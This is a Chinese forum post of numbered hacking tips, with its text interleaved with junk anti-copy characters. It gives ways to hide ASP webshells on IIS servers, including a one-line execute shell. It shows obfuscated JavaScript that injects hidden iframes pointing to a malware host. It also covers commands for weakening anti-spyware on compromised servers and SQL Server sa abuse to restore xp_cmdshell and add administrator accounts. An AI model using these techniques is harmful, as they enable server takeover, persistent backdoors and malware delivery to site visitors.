用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。/ B: i# M. |/ f+ c: a4 q
" F. u* W, f, Q
53、隐藏ASP后门的两种方法; P2 [$ M. L r
1、建立非标准目录:mkdir images..\: }# }3 k5 g) e4 `% S @
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp& y4 v% z S. d
通过web访问ASP木马:http://ip/images../news.asp?action=login7 {3 L6 P' I$ z5 C' Z/ n
如何删除非标准目录:rmdir images..\ /s
% H# H0 x7 Z- n' D2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:. y" p# g z3 I3 B5 n; ~. U$ s& ~7 r
mkdir programme.asp8 U1 A$ \ N, d- C D# g- v3 d
新建1.txt文件内容:<!--#include file=”12.jpg”-->
! D* C5 p0 z: F新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件8 J* ], X- d# n+ N! g
attrib +H +S programme.asp) F; D; X4 T1 p- L: q5 T0 P
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
$ U! _& a; Y' \9 Z3 w# A n6 Y" d, N: [ Y( |, u
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。4 ]' w" G2 x: i* n
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
1 h8 Z+ u5 L+ b# T. F! ?' d0 S* f8 `; [0 H6 o$ @& t3 ?" W& _
55、JS隐蔽挂马2 e# _! [, v) K" Z
1.
9 i! E# C) C' _( a; n3 H/ Rvar tr4c3="<iframe src=ht";
H7 h3 w G- |, Str4c3 = tr4c3+"tp:/";
^! _- g$ Z6 x4 e" B% s$ Otr4c3 = tr4c3+"/ww";3 m" u0 S# z# N
tr4c3 = tr4c3+"w.tr4";6 U& f/ {- o8 O, J' S$ z
tr4c3 = tr4c3+"c3.com/inc/m";2 Z6 Q4 O; p) D( V: T
tr4c3 = tr4c3+"m.htm style="display:none"></i";
& Z9 k, T" k, R! v j3 T( D1 {tr4c3 =tr4c3+"frame>'";
; S7 K3 q% a% X3 f0 N$ Fdocument.write(tr4c3);8 k: l% t: @# B6 K9 Z& [2 F
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。! {- n8 C Z; L' G5 q! r
) [+ K B! ^- Y0 p2.
' w) c$ f8 c ~) Z转换进制,然后用EVAL执行。如
+ n, B/ K* x+ W( b B4 ^# ?eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* ~9 y( U5 V2 g" X不过这个有点显眼。1 u4 e" I5 a; v9 \4 v
3.
. [% J& r9 e! l5 B( C1 y% Udocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
( t- x& g- E2 [3 y; y最后一点,别忘了把文件的时间也修改下。
O) v9 f5 Y' x- z9 Q% f
3 }5 ?; o u$ {0 b# m# _! F56.3389终端入侵常用DOS命令4 g, a5 O- |4 z3 Q; L U
taskkill taskkill /PID 1248 /t( t* S5 V7 X* f; R7 C" X. z
) l& _" p) A1 vtasklist 查进程. ?# N5 D5 j# u! T0 W4 j1 @7 r
% T/ m6 F* i! L' q7 m1 M" Q
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限 q5 X* T! _5 S) z+ ?* u( n( l
iisreset /reboot
5 E/ }6 P4 d; t& ]% e) s" p( j9 D' rtsshutdn /reboot /delay:1 重起服务器7 t2 v! A" g# c6 f" r
% `9 G3 e0 w- ^6 e; plogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
8 n: j" F; D' F( m% S4 N# x
: Q2 k7 x8 V* p6 n' Uquery user 查看当前终端用户在线情况
: }2 l; l I. u! X7 Y+ a2 x
0 y2 v2 N3 K6 ~, _* W要显示有关所有会话使用的进程的信息,请键入:query process *
; J% K$ h( R% \& N! N
; z7 s2 V+ U: S要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2: M+ p0 @/ c! X3 i, V1 O
, {6 d5 O0 N$ [ g+ E要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2# z0 M( e$ }- i
( |' A2 k& F8 f0 G+ P$ _4 H要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" n. W2 i$ H* P/ L) J: X% G2 C! G! V! w; u5 m& D
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
) Y0 c) A$ D! d, |7 Q% ^- i( O8 U# T! ]' t- Q u% {: J
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
5 D$ D# c, m3 v, @ {
/ i# V3 v7 p' G' Q2 @命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。1 t* q- O' w t" X4 P# v* y
' L! K. ^& D* E( ]/ g2 Q* H6 |* R命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
* s! ]* _& |2 T2 A& A0 |% h0 o
% X( m# s; p" h) C5 m56、在地址栏或按Ctrl+O,输入:; i7 d* I; U4 h! ~% X% P+ ~9 G
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
2 ~, M% H" @: j$ ~* Q& o. v5 y0 A1 I$ d6 h3 B
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
1 `/ L; O8 }. u8 E- p3 P5 f
% q) y9 {$ K3 T! a- l57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
- }3 N) i0 t; k; q2 O- {: n* p8 J用net localgroup administrators是可以看到管理组下,加了$的用户的。! n, s' f% m! m8 b. w }5 @, c
! E" |# l) Q: x( E0 Y58、 sa弱口令相关命令
7 v, ^* n4 i- K) N' g2 Z# h/ c) ~! ?) m8 J, _% p; W
一.更改sa口令方法:
& L- z7 X/ c% \+ q/ A9 }用sql综合利用工具连接后,执行命令:
% H; I& }; V3 K. C3 H5 _exec sp_password NULL,'20001001','sa'4 @2 z- {6 w' m. a! d
(提示:慎用!)
+ H' n: |# u; P2 A" N/ n
* p0 g- q4 O. ], g$ V# O二.简单修补sa弱口令.
; n4 n0 U4 w% Q- X3 }! g, m5 c# L) \- \6 D8 J
方法1:查询分离器连接后执行:# y1 K, g$ R; `) _9 D% ^
if exists (select * from
9 P0 t* z+ }- b# j5 v5 V7 Cdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
( B/ u% g4 K1 J3 d4 z+ z5 D: L+ B' WOBJECTPROPERTY(id, N'IsExtendedProc') = 1)# t4 P$ U1 |9 r* ?" f, A. w8 ?9 S
# C0 B9 ]. C1 ]3 w( @
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
5 Y8 }- h3 x) ]+ o9 X- p
6 f# X) v! C0 M1 T- c. h; A* l- H/ `7 jGO
) B$ x. g; A/ ~& T! v, g. M
1 l8 |$ z# ^3 H; O- m5 _+ { u然后按F5键命令执行完毕
4 |. d; n( f7 O8 ~* z
7 ^5 J5 M" v+ y方法2:查询分离器连接后1 d& o9 D, P% E0 ^6 B/ m, W: u
第一步执行:use master0 r9 f! \& B" ~
第二步执行:sp_dropextendedproc 'xp_cmdshell'! ^ o/ X: G3 Q; c. \
然后按F5键命令执行完毕& M5 r$ S7 \1 C" c z
4 _* O/ B" x3 d. _
, T' c: Q, ]! n) h/ E& ^9 |三.常见情况恢复执行xp_cmdshell.- z: R' Q2 ?2 r2 [+ C6 L
+ C0 ?+ N& }9 a, ^# k6 M( t k9 R0 b* o8 S
1 未能找到存储过程'master..xpcmdshell'.) A0 \( |4 M8 C# v) H" X3 v& [
恢复方法:查询分离器连接后,, r8 W0 g/ `- ?0 {* |6 i( U" ~
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 h( a4 {# L5 M$ f/ H( D" ?第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'2 |+ n. m# S2 r
然后按F5键命令执行完毕0 Q9 X' T# w" o
2 P; j+ i4 [' N8 ^2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
5 j1 o' X0 [6 L+ m" X2 H1 y恢复方法:查询分离器连接后,
6 { I" P8 C0 m5 M8 C第一步执行:sp_dropextendedproc "xp_cmdshell"
% L l9 B4 l: C s3 F9 t第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'/ s, L+ V) G* W) A5 }
然后按F5键命令执行完毕1 T! v5 T" l. v. j
- r; M- `( c9 a p+ n3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
$ M4 r, B; r# J8 E- r7 ^/ {恢复方法:查询分离器连接后,7 P" X6 ~3 X; E
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'. I, y* r* E9 R% u. Q( G
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ' @* \/ q( I- z8 y- c
然后按F5键命令执行完毕( v: x+ }7 {7 \; ]+ e
! k/ ~# L$ z: D" X) o四.终极方法.
/ q4 l$ W3 Q9 N如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
5 l3 F) [$ H5 r查询分离器连接后," v# L0 K" j" C) `) ~( l9 ?/ ]
2000servser系统:, j8 `' S7 i; o' z9 R0 x' a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'! ]) L! C& I- C7 A0 s8 a# y
6 ^" p- i+ B7 V/ z' Adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 N* l( a0 m' j0 w% [
" H% h& T( u$ Z% P9 r& P) s
xp或2003server系统:
- p+ D b5 ~+ M |0 D. i' f7 e% X* Q. U- e* F& _
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
3 d% f3 U5 h* D) q" h/ A& s8 a% m
$ Z2 `8 y) |; c* \( i! r" Wdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'9 I& y! w B* g) Q' V, }6 r r
|
发表于 2012-9-15 14:13:15
收藏
支持
反对